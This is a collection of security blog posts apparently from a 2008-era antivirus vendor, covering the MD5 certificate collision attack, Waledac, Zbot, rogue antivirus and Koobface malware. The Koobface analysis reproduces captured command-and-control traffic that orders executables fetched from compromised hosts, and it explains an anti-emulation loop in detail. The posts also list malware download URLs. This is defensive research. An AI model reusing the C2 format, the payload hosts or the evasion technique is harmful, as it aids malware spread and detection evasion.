Broken Trust

Yesterday's presentation at the Chaos Communication Congress by a handful of researchers brought to light that the use of MD5 for secure computing (digital certificates, SSL, etc) truly is gasping its last breath. A fine summary of the MD5 algorithm and its use by the Certificate Authorities is written up by Scott Merrill here.
Unfortunately, Mr. Merrill makes the same lame excuse for the CA's that most of the software world has made for decades regarding change: "MD5 has been known for some time to be weak against collision attacks, but running a CA is a pretty complex operation, so the entities behind them are slow to change." Pretty complex? When something is broken, profitable security enterprises have the resources to change it (the researchers themselves state that the "affected CAs are switching to SHA-1"). That excuse simply is not valid.

Is this security vulnerability something that we didn't already know about? Heck, a free MD5 crack demo is posted here and a fantastic study and MD5 collision attack source is served here.
The new work is a blow to the internet infrastructure that we depend on for secure communications. For CA's, trust is their business, and some have not been very good at deserving it. The group's work is impactful in that it brings to public light this specific application of md5 cracks. It takes a determined and seriously talented group like this to implement optimized algorithms for this specific application, and handle it properly. Let's hope that their work "stimulates better Internet security with adequate protocols".

Finally, Thomas Ptacek at Matasano made several excellent points about the work. The sky is not falling. Continue about your business on the internet with the same caution.
"If you take everything in the paper at face value, a couple things mitigate this attack:
* The research team had access not only to a cluster of PS3s but to a specially optimized MD5 collision-finding implementation, which they had because Lenstra's team has been playing with a PS3 cluster for awhile.
* The research team had access to a currently-unpublished optimization to (presumably the birthday-bits search part of) the collision-finding algorithm,
* The attack could be made impractical by randomizing the serial numbers for all future certs issued by RapidSSL (and, presumably, by banning MD5)."


Update: Chris Eng similarly laments that the problem never should have happened as a guest opinion posted on the 0day blog.

For those of you interested in the characters/researchers behind the work, Alexander Sotirov recently shared conceptual details and motivations behind it:
"Most of the theory behind our attack was published in the 'Target Collisions for MD5 and Colliding X.509 Certificates for Different Identities' paper in 2007 by Marc Stevens, Benne de Weger and Arjen Lenstra" and that "David Molnar and Jake Appelbaum noticed that RapidSSL was still using MD5 in 2008".

Season's Greetings with a postcard.exe

In a throwback to the Storm campaigns that we heavily reported on in 2007, another group has been spamming out links to malicious Season's Greetings' sites (a list of domains previously serving up "ecard.exe" variants can be found here), attempting to fool users into running "postcard.exe". Here is a screenshot of one server currently up this afternoon on an infected host on the Comcast network at 71.233.193.xx:



A visit to this page results in multiple client side exploits, delivered by multiple redirected web pages, which TF prevents. ThreatFire also stops the attacking executable file as Trojan.Waledac.

The attackers make it obvious what web site they are attempting to mimic in their social engineering scheme. The entire HTML header for the attacking web page on the malicious site was ripped directly from 123greetings.com, a popular ecard site. Here is some of the header from the malicious web page:
Title: New Year Cards, Free New Year eCards, Greeting Cards
meta name ="keywords" content="new year cards,free new year ecards,greeting cards,greetings,wishes for the new year,free e cards for new year,christmas and new year wishes,free new year greetings,free ecards for new year"
meta name="description" content="2009 is here! Fill your heart with new hopes, reach out for new opportunities and celebrate the New Year! Reach out to your friends, family,..."

Keep in mind that the legitimate www.123greetings.com site appears to send out ecards as Flash videos, and not as "postcard.exe" files.

Update (1/5/2008): Waledac variant card.exe continues to be distributed -- we're seeing hxxp://direct christmas gift.com as an offending server up and running with the same card store front.

Zbot Mailings on the Increase

Zbot is the kind of malware you really don't want to see on anyone's computer, stealing banking passwords and financial information.

We've been seeing more reports and ThreatFire preventions of the malware delivered along with a somewhat common email-based social engineering scheme. The Zbot variant is attached to an official sounding warning from the worldwide delivery group UPS. The file currently in circulation has a name somewhat like "Exl6512721.ZIP", and the contents of the email looks something like this text:

"Sorry, we were not able to deliver postal package you sent on November the 25th in time because the recipient's address is not correct.
Please print out the invoice copy attached and collect the package at our office.
If you do not receive package in ten days you will have to pay 36$ per day.

Your UPS Support Team "

The Zbot variant attempts to steal banking information and passwords from unsuspecting users, and this one sends the information off to a waiting server in russia. Fortunately, at this time, the servers are down.
You can see here that ThreatExpert now decodes the config files delivered with this nastiness. The post includes a list of financial institutions commonly being targeted.

As always, exercise caution when opening unusual emails and especially when opening attachments.

Antivirus 360 Distribution - Update Third Party Plugins

Antivirus 360 is the new Antivirus 2009 indeed. It is spreading using the same old commodity plugin exploit techniques as AV 2009. Be sure to update any QuickTime Player or Adobe Plugins that you may be running to the latest versions.



A number of web sites are delivering a variety of exploits to get this rogueware on your system. One method of delivery that seems to be very reliable is via a set of malformed pdf files. The malware files exploit various versions of the Adobe pdf reader, delivering download and execute shellcode, calling URLDownloadToFileA on hxxp://svc .ms / xrun.tmp, and Winexec on that download.



This file is a custom packed downloader. After a long delay, it contacts multiple web sites, then pulls down a number of files, including another awful Vundo package that was at the top of hit lists for years.
The first popup from the downloaded adware on the system was redirected to the Antivirus 360 Web Scanner, which is nothing more than cheap javascript pretending to scan one's hard drive and fraudulently claim malware is littering the system. On another system, we saw VirusRemover2008 being hucked by the redirected popup with lots of fraudulent detections and shocking warnings.

So please, keep this stuff off of your system. Update all third party plugins on your system.

AV360 is the New Antivirus 2009

Antivirus 360 is the newest Rogueware in high prevalence, while Virustotal AV detection results are extremely low, currently at 3/36. Our ThreatFire community is seeing and preventing far too many hits on this stuff today. It shamelessly re-uses the same AV2009 detection names, like "Spyware.IEMonster", and presents a simliar 37 phony malware detections on a system. Avoid this Rogueware site. The distributors shamelessly rip names like PC Magazine Editor's Choice to fabricate credibility:


You may end up with a file like "av360install_770522156496.exe" on your system, which drops av360.exe, among others.
At the very least, if you see this dialog (consistently full of bad english grammar, as in the poorly written Antivirus 2009 dialogs), kill it:



Steer clear of this stuff, here are a few new windows, presenting the same phony malware detections as AV2009 on a clean lab system:



It looks like this one altogether will take the place of Antivirus 2009 -- all of the sites that usually serve that Rogueware package are down.

It presents a large phony privacy violation alert early on:


A few phony statements that they might throw in your screen once running are listed here, in a variety of languages:
Threats detected
Privacy violation alert!
Antivirus 360 has detected numerous privacy violations. Some programs may send your private data to an untrusted internet host. Click here to permanently block this activity and remove the possible threat (Recommended)
System files modification alert!
Internal conflict alert!
Antivirus 360 has detected internal software conflict. Some application endeavors to access...
Spyware activity alert!
Spyware.IEMonster is a popular spyware that attempts to steal passwords from Web browsers...
Privacy Violation alert!
Antivirus 360 detected a Privacy Violation. A program is secretly sending your private data to an...
Some critical system files of your computer were modified by malicious program. It may cause system instability and data loss. Click here to block unathorised modification by removing threats (Recommended).
Gefahr! Missbrauch des Datenschutzes!
Antivirus 360 hat Missbrauch des Datenschutzes
Irgendeines Programm sendet heimlich Ihren privaten Daten in die ungesicherte Zone (empfehlt).
Gefahr!
Spyware Aktivitaten! Spyware.IEMonster Aktivitaten wurden festgestellt.
Prevention de la modification des fichiers de systeme!
Prevention de lactivite du Logiciel espion!
Internet Explorer, Mozilla Firefox, Outlook et dautres programmes, y compris des logins et des mots de passe des operations bancaires en ligne, eBay, PayPal....

Koobface Notes -- flash_update.exe, bolivar29.exe, tinyproxy.exe

Earlier last week, we first posted our usual warning about the spike in Koobface threats that our ThreatFire users were being protected against on their systems. That post set off some interest in the worm again. The last spike in the worm coincided with Dancho Danchev's post in November, following the first report in July of high worm prevalence.

Because requests for information and assumptions that the redirection to a video download make it Zlob have been repeated, and because the worm's components are actively being re-distributed in high prevalence, we'll spill another Dancho sized mug of coffee over additional and current technical details.

But first, an interesting note for users is that the social engineering scheme used to persuade users into installing the worm does not match the Adobe Flash Player install that the malware distributors are trying to spoof.
On a visit to the real adobe.com site, the user can click on an image to update their flash player:



Internet Explorer users visiting the Flash player install page then can hit "Agree", and they are provided with an ActiveX install. When Firefox and Chrome users visit the authentic Flash player install site and click on "Agree", they are prompted to install a file by the name of "install_flash_player.exe". Neither of these names are used by the worm distributors. The worm is provided as "flash_update.exe".

Multiple Koobface files are currently of interest here: flash_update.exe, bolivar29.exe, fmark2.dat, multiple batch files that delete these executables, tt_1209658078.exe, 351631.dll and tinyproxy.exe. Keep in mind that the end goal is to spread the 351631.dll file and the tinyproxy.exe files, installing them as a Bho and system service (in the lab, it was installed as the "Shell Hardware Detection (ShellHWDetection)" system service). Both of these components are nasty little bits of adware. When the bho identifies that a user is using a specific search engine, like google or yahoo, they are redirected to other sites. Ads are popped as well.

These were the files installed via a flash_update.exe executable being distributed and run a few hours ago from an unfortunate infected server in Serbia sitting on a home cable internet connection.

Flash_update.exe is a small executable simply packed with upx and encoded to obfuscate strings (http download links, interesting cookie information, etc):
Flash_update.exe
fbbed6d47afa77b21bcce76625be8559
36,864 bytes
upx packed
It drops c:\windows\bolivar29.exe, (an exact duplicate of itself) and calls CreateProcessA on that file to run it.
It writes a batch file to c: to delete itself, and calls CreateProcessA on the batch file and exits.

bolivar29.exe
fbbed6d47afa77b21bcce76625be8559
36,864 bytes
upx packed
Bolivar29.exe is an exact duplicate of flash_update.exe. When started, it checks its own filename. If it is bolivar29.exe, the infection has already occured, so it doesn't need to drop another copy of itself. It looks for looks for ed323432006.dat on the c: drive and checks for social networking "cookies" and data files. It drops another file, tt_1228867129.exe, into the temp directory, that POSTS back to a web server:
_______________________________________
/fb/first.php HTTP/1.0
Host: 5824125537.com
User-Agent: Mozilla/5.01 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.1) Gecko/20040201 Firefox/3.0.4
Content-type: application/x-www-form-urlencoded
Connection: close
Content-Length: 81

f=0&a=-xxx&v=19&c=2&s=fb&l=&ck=1&c_fb=1&c_ms=0&c_hi=0&c_be=0&c_fr=0&c_yb=0HTTP/1.1 200 OK
Date: Wed, 10 Dec 2008 xx:xx:xx GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 148
Connection: close
Content-Type: text/html

START|http://www.teamtga.com/images/games/gif/tinyproxy23.exe
START|http://www.teamtga.com/images/games/gif/6243.exe
FBTARGETPERPOST|20
#BLACKLABEL
_______________________________________

It pulls the files listed in the response down and installs them.

Tinyproxy.exe is the final install. When it is installed as a service and interacts with the Bho dll it proxies and redirects the infected system's browser to multiple ad sites. The file itself is copied with Hidden and System attributes, so on most systems, the file is not displayed in a "c:\program files\tinyproxy" folder window.
Last week this file was hosted at the American International Baseball Club web server in Vienna (www.aibc.vienna.org), even though some reports stated it had been taken down. This lastest infection shows that the files are served up at another compromised server. Here is a link to the Bho installer: www.team ga.c om/images/g ames/gif/ 6243.exe.

Last week, we saw our IE web browser redirected to ads from Yahoo! HotJobs, the March of Dimes Foundation, and constant redirections to www-find-www.com and 216.195.52.100.
This time, when we opened a browser to Yahoo!, searched on "Cha Ca Vietnam" and clicked on a result, our browser was redirected to "http://www-find-www.net/?q=cha%20ca"



When we opened a browser to Google on the infected system, searched on "Cha Ca Vietnam" and clicked on a result, a new window popped open to
http://morefindit.com/?q=cha%20ca
with a final redirection to
http://www.toseeka.com/search.php?q=Cha+Am



Ugh. This global mess continues on as a massive financially motivated browser hijacking scam.

Internet Explorer 7.0 0day

A suspected IE7 0day has surfaced on servers in China. Ryan Naraine posted information earlier this morning on the state of the patch and the exploit.

A couple of our ThreatFire users unfortunately visited the site, but fortunately they have been protected against multiple exploit attempts from that site. We are trying to trigger and analyze the 0day amongst the others, but it appears to be rather unreliable in exploiting a mshtml.dll vulnerability. The site attempts to attack multiple ActiveX control vulnerabilities, the ancient MS06-014 vuln, and several others. At the very least, the stash of trojans, rootkit components and password stealers delivered by it are prevented by ThreatFire.
Most of the malware appears to be gaming password related, and the 0day exploit implemented in javascript attempts to identify the OS your system is running and attacks WindowsXP or Windows 2003 accordingly.

Be sure to keep your Microsoft patches up-to-date, there should be more later today. A patch for the 0day flaw will follow.

Global Recession Hits Every Market?

A somewhat behind the scenes Crimeware-as-a-service scheme opened up shop a few weeks ago in time for the holidays, but to a lack of "customers".


Currently, the service is set up to host 30 customer sites, and since November, the group has taken on a measly seven. For this market, that is not much momentum. At 50 bucks a month for hosting, the group is taking on a petty 350 U.S. dollars for the service. The global recession seems to be hitting every market.

Koobface Anti-Emulation Time Lock Trick

Koobface contains a lot of interesting tricks, components, and schemes to write about. In the interest of keeping this post somewhat brief, we'll focus on an anti-emulation technique that may be keeping the AV detection rates low for repacked and redistributed Koobface executables, while at the same time providing vendors with a false or confused sense of effectiveness.

At worm runtime in the lab, we observed that one unpacked loop in particular was taking excessively long to execute prior to any identifiable malicious behavior from the worm, and this same loop is present in four of the five binaries that the Koobface flash_update component is dropping. So we took another look.

Within the common loop, GetTickCount() was called and bytes were moved and compared, but it seemed that no real decryption was occuring. Persistent data was not rewritten or modified. This sort of activity is suggestive of something called a time-lock: "A common anti-emulation trick is to introduce loops that take a relatively long time to compute. The loop may in fact take so long to emulate that the antivirus scanner gives up."
However, what appears to be a Koobface time lock implementation is very simple, much more simple in its implementation than the ones formalized in the paper linked to above. But the concept is just as interesting in that it implements a variable length lock duration at runtime. The amount of time dedicated to spinning through the loop is in part dependent on the amount of time that the system has been running. And yet, the technique's usage is uncommon in that there are not two timing calls and a hardcoded value to compare against to detect emulation. Instead, this unusual variability is due to its unique use of a singular GetTickCount() call and a comparison to a counter value that is also being incremented.

Here is the loop that we were interested in, as viewed through a debugger:

00401712 |> /83C9 FF /or ecx, FFFFFFFF
00401715 |. |33C0 |xor eax, eax
00401717 |. |8D7C24 10 |lea edi, dword ptr ss:[esp+10]
0040171B |. |F2:AE |repne scas byte ptr es:[edi]
0040171D |. |F7D1 |not ecx
0040171F |. |49 |dec ecx
00401720 |. |3BF1 |cmp esi, ecx
00401722 |. |73 18 |jnb short DA3FE57A.0040173C
00401724 |. |8BC6 |mov eax, esi
00401726 |. |99 |cdq
00401727 |. |B9 05000000 |mov ecx, 5
0040172C |. |F7F9 |idiv ecx
0040172E |. |8A4C34 10 |mov cl, byte ptr ss:[esp+esi+10]
00401732 |. |B0 FB |mov al, 0FB
00401734 |. |2AC2 |sub al, dl
00401736 |. |02C8 |add cl, al
00401738 |. |884C34 10 |mov byte ptr ss:[esp+esi+10], cl
0040173C |> |46 |inc esi
0040173D |. |FFD3 |call near ebx ; kernel32.GetTickCount
0040173F |. |83C9 FF |or ecx, FFFFFFFF
00401742 |. |8BD0 |mov edx, eax
00401744 |. |33C0 |xor eax, eax
00401746 |. |8D7C24 10 |lea edi, dword ptr ss:[esp+10]
0040174A |. |F2:AE |repne scas byte ptr es:[edi]
0040174C |. |F7D1 |not ecx
0040174E |. |49 |dec ecx
0040174F |. |03D1 |add edx, ecx
00401751 |. |3BF2 |cmp esi, edx
00401753 |.^\72 BD \jb short DA3FE57A.00401712

When the first location is jumped into, esi is already set to "0".
It's a nice loop -- the last insruction takes you back to the first almost every time, but the loop is executed an unpredicatable number of times. Mostly all of the instructions within the loop are arbitrary in that they do not modify any data. For example, the "repne scas byte ptr es:[edi]" instructions simply read through a hard-coded string, looking for the null byte at the end of the string. That same string is read again and again, almost like a strlen() that doesn't return a value:
void strlen (const char * str) {
const char *pstr = str;
while( *pstr++ ) ;
}
When GetTickCount is called, it returns the number of milliseconds that have elapsed since the system was started. Because this value changes on every system it is run and every time it is called, the duration of the time lock will be unpredictable. When edx (our TickCount) is sub'd from esi, the CF flag is set to "1", and the jb instruction sees the value as "below", so we jump back to the first instruction location. Every loop execution, both the esi and edx values are incremented and then compared. When they are equal, the loop is exited.

Therefore, the effect is that emulators may "give up" on this executable due to the loop, but the behavior is somewhat unpredictable. Sometimes, the lock duration will be short enough for an emulator to hang on and perform an erratic detection. This erratic detection may cause confusion for AV scanner vendors relying on emulation capabilities and create a false sense of effective detection.

Finally, it is interesting that the "worm" components and droppers contain this same loop, as though it were a macro simply copied and pasted into the source for the various executables. The final and money making adware payload, "tinyproxy.exe", did not contain the loop. The adware/spyware component most likely was obtained from another party.

Dave's $30 Billion Smashter Prediction

Sometimes you get a crystal ball prediction and gimmickry. Sometimes you get something with real insight. Dave Aitel's real insight on DailyDave this morning focused on a NY Times article about the U.S. federal government's National Security Presidential Directive 54/Homeland Security Presidential Directive 23 that Bush signed in January 2008:
"Faster, smashter. When I see 30 billion dollars, I can tell you what you're going to get, as a taxpayer, for your money: Patch management, IDS, Anti-Virus, scanners of all shapes and sizes. Audits. Big rooms full of large screens correlating information that has absolutely no relevance to security. You can't correlate what you can't see. You can't patch what you don't know about.
Mr. Markoff is trying to tell us that the defenders are losing the battle. But if they are, it's because they *chose* to. Hackers use 0day and always have. The defenders are off making millions selling things that don't work against 0day.
I guess what I'm trying to say here is that at this point the attackers are just "reasonably competent". When it comes to offensive information security, we ain't seen nothing yet."

NPR, the Washington Post, and the NYT have all been spending more time reporting on computer security. It was very interesting to hear a guest on Boston NPR's hour long "On Point" this morning discussing characteristics of Secretary of Defense Robert Gates' laptop and other PC based resources at the U.S. Department of Defense, as well as the legal arm-twisting used to silence individuals that have participated in security breach investigations. And therein lies the real problem. All the discussion in the world about network security is useless when talk about real issues is silenced, and the individuals that need to protect their organization's data do not understand or cannot describe what they need to protect it from.

Koobface flash_udpate.exe Around the World

We are analyzing the binaries and koobface processes and will provide detailed technical information later -- this one performs lots of process, system admin, file create/delete activity, and each one has a tricky anti-emulation trick that we'll describe here. Also of note, the server that was allegedly compromised to serve up koobface-downloaded adware/clickfraud executables in early November continues to serve up malware:
hxxp:// www.aibcvienna.o rg/ youtube/fb.28.exe
The unfortunate piece is that this binary continues to see only 15/38 AV scan detections at virustotal.

In the meantime, here is a map of only some of the attacking servers hosting the Koobface worm since the very end of November. As you can see, there are some concentrated pockets of the worm's distribution servers throughout Europe, but it is a global problem:

Koobface on the Loose as "flash_update.exe"

"Koobface". Like "Facebook", only sort of backwards. Clever.

Social networking worms like the Koobface family are a reality, and their prevalence shows on our threatfire community. Users of facebook need to be aware that links appearing on friends' facebook pages may be links to malware downloads. Now, no need to stop clicking on links or visiting friends' pages. But just because a link is on a friend's page does not mean that the content at that link can be unconditionally trusted.

Basically, if you click on a link at a friend's profile, and your browser is redirected to a video page, do not download and run the executable when prompted. The consistent and malicious "flash_update.exe" is being prevented in high prevalence on a daily basis in our community. The little trick here is a twist on the need to update Adobe's Flash Player. But if you need to update your Flash Player, just go to Adobe's site and update it there. Here's an example from a Koobface distribution site already taken down:



Running the "flash_update.exe" download results in all sorts of problems for the user, including potential modifications to their own Facebook profile, prompting for captcha breaks, and others. The immediate result is an error message, "Error installing Flash Update. Please contact support".


In the infections we're observing this morning, an executable resembling the name "bolivar28.exe" is dropped to the system drive and run.


Update: the dropped executables, named "bolivar26.exe, bolivar28.exe" and so on, are copies of the original flash_update.exe files. A quick analysis shows them to be similar in functionality to the captcha crack scheming binaries previously observed in the wild. Also interesting is that these files are worming through and attacking other social networking sites like myspace.com, blackplanet.com, friendster.com, and bebo.com, in addition to its namesake.

Who Gave These Guys a Cert?

Xxx41.exe is a filename commonly associated with a trojan-downloader family that we've seen prevented all over the community for the past couple of weeks. It sometimes is dropped and run by phony video codecs with names like "moviecodec.278.exe", "k-codec.232.exe", etc. Xxx41.exe downloads fakealert executable components from sites like image-big-library.com and top100image.com using GET requests that evade weak firewall filters, looking like image file requests "/images/item_edjf.gif" and "/infoweek/footernav/new0808/ethrexpo.gif", which are then renamed to ~tmpc.exe (and similar names) and run on the system.



Interestingly, amongst the AntiVirus 2009 and ProAntiSpyware rogueware component downloads, a valid digital certificate popped up from "AntiSpywareSolutionsPro, Inc" out of Belize City, Belize for a "VirusRemover2008" component.



So, we can see who provided the certificate, the next question is why. Can some of the most prevalent rogueware groups on the internet continue to get valid digital certs from trusted providers? Next, will the Rustock, Coreflood and Storm groups have digitally signed certs for secure botnet sessions?

Crack.exe

If you find yourself installing and running cracks and keygens that you're downloading over Limeware, stop what you're doing. First, stop using cracks and pirated software. Secondly, nothing truly is for free.

Limewire users have been seeing various keygens offered over their P2P connections. Over the past few days, there have been multiple releases of AVG LICENSE KEY CRACK BY [SSG].ZIP, HALO KEYGEN BY [ZWT].ZIP, REALTEK AUDIO DRIVER CRACKED BY -=ROGUE=-.ZIP, and NERO 9 NO PATENT CRACK BY ZWT.ZIP. And surprise, surprise, all of these files come with a little treat inside, crack.exe. We've seen this sort of keygen package bundled with some severe malware in the past, and we continue to see downloaders and adware installed by this stuff.

Taking a quick look, we find that this dropper will disable the Windows Security Center and Firewall. It will then scan through the system32 directory, attempting to find a random dll name string to borrow from, and then select some digits from the system time to create its dropped dll name string, always ending with "32.dll". For our ThreatExpert report, the malicious downloader file name created was "glu3232.dll", and we can identify pieces of the code used to create a random portion of the name here:


and the concatenation of that semi-randomized string with "32.dll" here:

Retirement Community Computers, brastk.exe and AntiVirus 2009

Malware shows up in the most unexpected places. One of my previous colleagues regularly considered the idea of computer infections ridiculous, but wired Windows systems really are ubiquitous. And this last week's Thanksgiving trip provided another location to observe computer malware effecting unsuspecting Windows users.

This year's birthday celebration for our 92-year old grandmother was fantastic at her new home. Singing, dessert, multiple generations of our family were together for the holiday and grandma was in a great mood in her new digs.

In the meantime, a few of us celebrants, full of pizza and cake, left the party to check out the community building -- the pool table on the fourth floor, pianos on the first. After knocking an 8ball around the pool table at 8 p.m. in the relative quiet of the home, we noticed a computer center along the way back to the elavators. The monitors in that center could not have displayed a more disappointing screen.
Next to a little "M" square in the system tray (a competing AV product that will remain nameless here), was a large red circle with a white X through it and a familiar fakealert bubble caption containing a frightenting message about an infection and loss of privacy: "Privacy Violation Alert! Antivirus 2009 detected a Privacy Violation".



A quick look at the registry and taskman showed a spambot, the brastk.exe fakealert downloader, AntiVirus 2009, and a vundo component all installed and running. The brastk.exe downloader, one of the most familiar fakealert components that is being prevented in the ThreatFire community, was running full bore. And the Vundo dll locked up the CPU from within the explorer process. Add a half dozen ads open in half a dozen hung Internet Explorer windows, and the system was unusable.
There were various poker game shortcuts on the desktop, so I'm guessing that one of the senior citizens looking to play a game mistakenly installed a package of malware on the system, assuming that the free software game was innocent and the system was protected.
For a group of elderly that don't know much about technology but want to use it, this is very disappointing and discouraging.

Along those lines, the recent unusual and severe Mytob infection bringing down several british hospitals (the London Chest Hospital, the Royal London Hospital and St Bartholomew's) highlights the need for layered security as well. Malware is as ubiquitous as the PC itself.